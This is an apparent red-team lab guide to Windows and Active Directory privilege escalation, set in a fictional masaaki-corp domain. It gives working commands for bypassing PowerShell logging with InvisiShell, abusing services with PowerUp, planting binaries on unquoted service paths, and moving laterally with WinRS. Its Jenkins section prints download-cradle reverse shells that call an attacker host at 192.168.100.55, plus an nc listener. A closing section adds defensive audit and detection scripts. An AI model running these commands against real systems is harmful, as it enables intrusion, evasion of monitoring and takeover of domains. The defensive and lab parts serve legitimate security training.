1. Setup — Loading Tools Without Detection

Every command in this guide runs inside an InvisiShell session to bypass PowerShell logging. Never skip this step — running PowerUp or loading Mimikatz in a default PowerShell window generates events that will get you caught.

# Start InvisiShell (no admin required)
C:\AD\Tools> .\InvisiShell\RunWithRegistryNonAdmin.bat

# All subsequent commands run in this session
PS C:\AD\Tools>

Tool staging matters: Pre-stage PowerUp, WinPEAS and PrivEscCheck on the target or a reachable share before the engagement. Downloading them during the operation triggers network-based IDS and endpoint AV.

2. PowerUp — Automated Misconfiguration Scanner

PowerUp is part of the PowerSploit framework and automates discovery of the most common privilege escalation vectors on Windows: writable service binaries, unquoted service paths, weak registry permissions, misconfigured scheduled tasks, and more. It is the first tool you run on any new machine.

2.1 Running All Checks
# Load PowerUp into memory
PS C:\AD\Tools> . .\PowerUp.ps1

# Run all checks — outputs every finding with an AbuseFunction suggestion
PS C:\AD\Tools> Invoke-AllChecks

PowerUp checks for the following categories and outputs an AbuseFunction for each finding — a direct command you can run to exploit it:

Unquoted Service Paths

Service paths with spaces and no quotes. Windows tries to execute files in each path segment — you plant a malicious binary in the highest-privilege writable directory.

Modifiable Service Binaries

A service executable that your user can overwrite. Replace it with a payload, restart the service, get SYSTEM.

Modifiable Service Configs

You can change the service's binary path via sc config. Point it at your payload.

Weak Registry ACLs

Registry keys for services that your user can write. Modify ImagePath to point to your binary.

AlwaysInstallElevated

Both HKLM and HKCU registry keys set to 1. Any MSI package installs as SYSTEM regardless of the user running it.

DLL Hijacking Paths

Directories in %PATH% that your user can write. A service loading a missing DLL from a writable path is hijackable.


3. Service Abuse — Unquoted Paths & Writable Binaries

Services are the most reliable local privilege escalation primitive on Windows. When a service runs as SYSTEM (the default for most third-party software) and its configuration is misconfigured, any user who can influence its execution path gets SYSTEM.

3.1 Exploiting a Misconfigured Service with Invoke-ServiceAbuse

Scenario: PowerUp found a vulnerable service — MasaakiWebServer — running as SYSTEM with a modifiable binary path. Invoke-ServiceAbuse automates the exploitation: it modifies the service config to add your user to the local Administrators group, restarts the service, then restores the original config.

# Exploit the vulnerable service to add masaaki to local admins
PS C:\AD\Tools> Invoke-ServiceAbuse -Name 'MasaakiWebServer' -UserName 'masaaki-corp\masaaki' -Verbose

# Verify local admin membership (log off and on, or start a new token)
PS C:\AD\Tools> Get-LocalGroupMember -Group "Administrators"

# Or classic net command
C:\AD\Tools> net localgroup administrators

How it works: The service runs as SYSTEM. By modifying its binary path (or the binary itself) to run net localgroup administrators masaaki-corp\masaaki /add, the SYSTEM-level process adds your account to local admins when the service restarts. PowerUp handles the modification and restoration automatically.

3.2 Manual Unquoted Service Path Exploitation

If a service has a path like C:\Program Files\Masaaki App\service.exe (unquoted, with a space), Windows tries to execute these paths in order:

  1. C:\Program.exe
  2. C:\Program Files\Masaaki.exe
  3. C:\Program Files\Masaaki App\service.exe (the real one)

If you can write to C:\Program Files\, you plant Masaaki.exe there and it runs as SYSTEM before the real binary.

# Find all unquoted service paths manually
PS C:\AD\Tools> Get-WmiObject Win32_Service | Where-Object {
    $_.PathName -notmatch '"' -and $_.PathName -match ' '
} | select Name, PathName, StartMode

# Check if the exploitable directory is writable
PS C:\AD\Tools> Get-Acl "C:\Program Files\Masaaki App" | select -ExpandProperty Access

# Place payload, then restart the service
PS C:\AD\Tools> Restart-Service -Name MasaakiApp -Force
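As an added audit example (not code from the original guide), this script does the defender's side of the unquoted-path category from section 2 and the manual check above: for each unquoted service path it derives the executables Windows would try before the real binary and reports any whose parent directory grants CreateFiles to a broad group. It assumes it runs elevated on the host being audited, and the list of broad principals is our choice.

```powershell
# Added audit example, not code from the original guide: for each unquoted service
# path, derive the executables Windows would try before the real binary and report
# any whose parent directory grants CreateFiles to a broad group. Assumes it runs
# elevated on the host being audited; the list of broad principals is ours.
$BroadPrincipals = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')

# "C:\Program Files\Masaaki App\service.exe /run" -> C:\Program.exe, C:\Program Files\Masaaki.exe
function Get-UnquotedPathCandidates {
    param([string]$PathName)
    $parts = $PathName.Trim() -split ' '
    $candidates = @()
    for ($i = 1; $i -lt $parts.Count; $i++) {
        $prefix = $parts[0..($i - 1)] -join ' '
        if ($prefix -match '\.exe$') { break }   # reached the real binary; stop
        $candidates += "$prefix.exe"
    }
    return $candidates
}
# True when an Allow ACE for a broad principal includes the right to create files here
function Test-BroadCreateFiles {
    param([string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory -PathType Container)) { return $false }
    $createFiles = [int][System.Security.AccessControl.FileSystemRights]::CreateFiles
    foreach ($ace in (Get-Acl -LiteralPath $Directory).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($BroadPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        # Generic rights show up as raw ints and are not mapped here; Modify/FullControl include CreateFiles
        if (([int]$ace.FileSystemRights -band $createFiles) -ne 0) { return $true }
    }
    return $false
}
function Get-UnquotedServicePathFindings {
    Get-CimInstance Win32_Service |
        Where-Object { $_.PathName -and $_.PathName -notmatch '"' -and $_.PathName -match ' ' } |
        ForEach-Object {
            $svc = $_
            foreach ($candidate in (Get-UnquotedPathCandidates $svc.PathName)) {
                [pscustomobject]@{
                    Service   = $svc.Name
                    RunsAs    = $svc.StartName
                    Candidate = $candidate
                    Writable  = Test-BroadCreateFiles (Split-Path -Path $candidate -Parent)
                }
            }
        }
}

# Only rows where a broad group could plant the candidate are worth a ticket
Get-UnquotedServicePathFindings | Where-Object Writable | Format-Table -AutoSize
```

Quoting the path with sc config or fixing the directory ACL clears a row; re-run after the change to confirm Writable is no longer true.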

4. WinPEAS — Comprehensive Enumeration

WinPEAS (Windows Privilege Escalation Awesome Scripts) is a more exhaustive scanner than PowerUp. It checks everything — system info, installed software, scheduled tasks, network shares, stored credentials, token privileges, registry autoruns, and DPAPI master keys. It's noisier but leaves nothing unchecked.

# Run WinPEAS (obfuscated version to bypass AV)
C:\AD\Tools> .\winPEASx64.exe notcolor log

# The "log" flag saves output to a file — useful for reviewing findings offline
# "notcolor" removes ANSI codes if redirecting output

# Run only specific categories for speed
C:\AD\Tools> .\winPEASx64.exe systeminfo userinfo processinfo servicesinfo applicationsinfo windowscreds

# Run the .NET version if the exe is flagged
PS C:\AD\Tools> .\winPEASany.exe

Reading WinPEAS output: WinPEAS colour-codes findings — red means a high-confidence privilege escalation path, orange/yellow means interesting but needs verification. Focus on red findings first: token privileges (SeImpersonatePrivilege, SeDebugPrivilege), stored credentials, and writable service paths.

High-Value WinPEAS Findings to Target

SeImpersonatePrivilege

Any service account with this token privilege is vulnerable to Potato attacks (PrintSpoofer, GodPotato, JuicyPotato). Instant SYSTEM from IIS, SQL Server or Exchange service accounts.

Stored Credentials (cmdkey)

Windows Credential Manager can store plaintext passwords. WinPEAS lists all saved credentials — these can be reused with runas /savecred without knowing the actual password.

AutoLogon Credentials

Found in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon. Servers configured for automatic login store the password in plaintext in the registry.

Writable Autorun Paths

Executables that run at system startup from writable directories. Replace the binary and wait for a reboot or trigger the autorun manually.


5. PrivEscCheck — Structured Audit

PrivEscCheck is a PowerShell script that performs a structured, report-style audit of privilege escalation vectors. Unlike WinPEAS it produces clean, categorised output that is easier to parse and include in reports.

# Load and run PrivEscCheck
PS C:\AD\Tools> . .\PrivEscCheck.ps1
PS C:\AD\Tools> Invoke-PrivescCheck

# Extended checks (includes more checks, takes longer)
PS C:\AD\Tools> Invoke-PrivescCheck -Extended

# Output as HTML report
PS C:\AD\Tools> Invoke-PrivescCheck -Report PrivEsc-Report -Format HTML

PrivEscCheck categorises findings into: Config (system misconfigs), Creds (stored credentials), Updates (missing patches), Services (service misconfigs), DLL Hijacking, and Scheduled Tasks.


6. Finding Machines Where You Already Have Local Admin

Before escalating privileges on your current machine, check whether you already have local admin access on other machines in the domain — perhaps from a group membership or a previous deployment. This saves you the escalation step entirely on those targets.

# Load the script
PS C:\AD\Tools> . .\Find-PSRemotingLocalAdminAccess.ps1

# Scan all domain computers — outputs machines where masaaki has local admin
PS C:\AD\Tools> Find-PSRemotingLocalAdminAccess

# Example output:
masaaki-adminsrv
masaaki-dev01

# This means masaaki has local admin on masaaki-adminsrv and masaaki-dev01
# No privilege escalation needed on those machines — jump straight there

Why this matters: In real environments, IT admins often add service accounts or helpdesk groups to local admin on multiple machines for management purposes. A single compromised low-priv user might already have local admin on dozens of machines. Always check before spending time on escalation.

7. Lateral Movement via PS Remoting & WinRS

Once you have local admin on a remote machine, use WinRS or PS Remoting to get a shell on it. These are legitimate Windows remote management protocols — much less suspicious than spawning reverse shells.

# WinRS — interactive CMD session on the remote machine
C:\AD\Tools> winrs -r:masaaki-adminsrv cmd

# PowerShell Remoting — PS session
PS C:\AD\Tools> Enter-PSSession -ComputerName masaaki-adminsrv.masaaki-corp.local

# Confirm you're on the remote machine and who you are (whoami prints DOMAIN\user; $env:USERNAME would print only the user part)
[masaaki-adminsrv.masaaki-corp.local]: PS C:\Users\masaaki\Documents> whoami
masaaki-corp\masaaki

# Run a command on a remote machine without entering a session
PS C:\AD\Tools> Invoke-Command -ComputerName masaaki-adminsrv -ScriptBlock { whoami; hostname }

# Run a script on a remote machine (load tools remotely)
PS C:\AD\Tools> Invoke-Command -ComputerName masaaki-adminsrv -FilePath .\PowerView.ps1

8. Exploiting Jenkins for Domain Admin

Jenkins is a CI/CD platform that allows authenticated users to define build jobs with custom build steps — including arbitrary OS commands. A Jenkins instance where any domain user can configure builds is effectively a remote code execution server running under a privileged service account.

Why Jenkins is so dangerous in AD: Jenkins services are often configured to run as a domain service account with elevated privileges — sometimes Domain Admin — so that it can deploy builds to production servers. Compromising Jenkins can mean instant Domain Admin without touching a single vulnerability.

8.1 Getting Code Execution via Jenkins Build Steps

Scenario: Jenkins is running on masaaki-ci:8080. You have access (via a found credential or unauthenticated access) to configure a build job. You add a Windows batch command step to get a reverse shell back to your attacking machine.

  1. Navigate to the Jenkins dashboard and create or edit a build job.
  2. Under Build Steps, add an Execute Windows batch command step.
  3. Enter a PowerShell download-cradle to pull and execute a reverse shell:
    powershell.exe iex (iwr http://192.168.100.55/Invoke-PowerShellTcp.ps1 -UseBasicParsing)
    
  4. On your attacking machine, host the reverse shell script and start a listener:
    # Host the script
    python3 -m http.server 80
    
    # Listen for the callback (use nc or powercat)
    nc -lvnp 443
    
  5. Trigger the build. The Jenkins service account executes your code.

8.2 Jenkins Script Console — Groovy RCE

If you have admin access to Jenkins, the Script Console (/script) runs arbitrary Groovy code directly in the Jenkins JVM process. This is the most direct path to code execution.

// Navigate to: http://masaaki-ci:8080/script
// Run system commands via Groovy (comments use Groovy's // syntax so the block pastes as-is):

def cmd = "whoami"
def proc = cmd.execute()
proc.waitFor()
println proc.text

// Full reverse shell via Groovy
def cmd2 = ['powershell.exe', '-c', 'iex (iwr http://192.168.100.55/shell.ps1 -UseBasicParsing)']
cmd2.execute()

9. Prevention & Detection

Audit Service Configurations

Run PowerUp in audit mode quarterly. Unquoted service paths and writable service binaries are easy to fix — quote the paths, restrict write permissions — but rarely get attention during deployments.

Apply Principle of Least Privilege to Services

Services should run as dedicated low-privilege service accounts, never as SYSTEM or Domain Admin. Use managed service accounts (MSA / gMSA) where possible — their passwords rotate automatically.

Restrict Jenkins Access

Require authentication for all Jenkins access. Disable the Script Console for non-admin users. Never run Jenkins as a Domain Admin service account — create a dedicated, minimally privileged account.
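For the two points above (least-privilege service accounts and not running Jenkins as a privileged domain account), here is an added audit example that is not code from the original guide: it lists services that log on with a domain account and flags those that are not MSA/gMSA. It assumes it runs on the server being audited, such as the Jenkins host.

```powershell
# Added audit example, not code from the original guide: list services that log on
# with a domain account and flag those that are not MSA/gMSA (names ending in '$'),
# since those keep a static password and whatever group rights they were once given.
# Assumes it runs on the server being audited, e.g. the Jenkins host.
function Get-DomainServiceAccounts {
    # LocalSystem, NT AUTHORITY\*, NT SERVICE\* virtual accounts and local users are out of scope
    $localPattern = '^(LocalSystem$|NT AUTHORITY\\|NT SERVICE\\|\.\\|' + [regex]::Escape($env:COMPUTERNAME) + '\\)'
    Get-CimInstance Win32_Service |
        Where-Object { $_.StartName -and $_.StartName -notmatch $localPattern } |
        ForEach-Object {
            $acct    = $_.StartName
            $managed = $acct -match '\$$'    # gMSA/MSA: the domain rotates the password
            [pscustomobject]@{
                Service = $_.Name
                Account = $acct
                State   = $_.State
                Binary  = $_.PathName
                Finding = $(if ($managed) { 'managed account' } else { 'static-password domain account: review group membership' })
            }
        }
}

# On the Jenkins host this shows which account the jenkins service runs as
Get-DomainServiceAccounts | Format-Table Service, Account, Finding -AutoSize
```

Any flagged account should then be checked in AD for membership in Domain Admins or other privileged groups and moved to a gMSA where the product supports it.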

Monitor Token Privilege Abuse

Alert on SeImpersonatePrivilege and SeDebugPrivilege usage by non-service accounts. These events appear in the Security event log as Event ID 4672 ("Special privileges assigned to new logon", in the Special Logon audit subcategory).
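As an added detection example (not code from the original guide), this script reads recent 4672 events from the Security log and flags logons that were granted SeImpersonatePrivilege or SeDebugPrivilege to an account outside an allowlist. It assumes rights to read the Security log; the allowlist entries are constructed placeholders to replace with the environment's known service accounts.

```powershell
# Added detection example, not code from the original guide: read recent 4672
# (special privileges assigned to new logon) events and flag logons granted
# SeImpersonatePrivilege or SeDebugPrivilege to accounts outside an allowlist.
# Assumes rights to read the Security log; the allowlist entries are constructed
# placeholders to replace with the environment's known service accounts.
$Allowlist = @('SYSTEM', 'LOCAL SERVICE', 'NETWORK SERVICE', 'svc_sql')
$Watched   = @('SeImpersonatePrivilege', 'SeDebugPrivilege')

function Get-SuspiciousPrivilegeLogons {
    param([datetime]$Since = (Get-Date).AddHours(-24))
    $filter = @{ LogName = 'Security'; Id = 4672; StartTime = $Since }
    foreach ($evt in (Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue)) {
        # EventData fields arrive as <Data Name="...">text</Data>; collect them into a hashtable
        $data = @{}
        foreach ($d in ([xml]$evt.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        $user = $data['SubjectUserName']
        # Machine accounts (trailing $) and allowlisted identities legitimately hold these rights
        if ($user -match '\$$' -or $Allowlist -contains $user) { continue }
        # PrivilegeList is whitespace-separated; keep only the privileges we care about
        $privs = @($data['PrivilegeList'] -split '\s+' | Where-Object { $Watched -contains $_ })
        if ($privs.Count -eq 0) { continue }
        [pscustomobject]@{
            Time    = $evt.TimeCreated
            Account = "$($data['SubjectDomainName'])\$user"
            LogonId = $data['SubjectLogonId']
            Privs   = ($privs -join ',')
        }
    }
}

# One row per flagged logon; 4672 fires on every elevated logon, so tune the allowlist
Get-SuspiciousPrivilegeLogons | Format-Table -AutoSize
```

The LogonId column joins to the matching 4624 event and to any later 4688 process-creation events from the same session, which is what an analyst needs to see what the privilege was used for.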

Enable PowerShell Constrained Language Mode

Constrained Language Mode prevents PowerShell from loading arbitrary .NET types and executing advanced scripts. Combined with WDAC (Windows Defender Application Control), it significantly raises the cost of PowerUp and similar tools.

Credential Manager Hygiene

Audit stored credentials on all machines (cmdkey /list). Remove any stored domain credentials. Attackers with local admin can extract these from DPAPI without needing the user's password.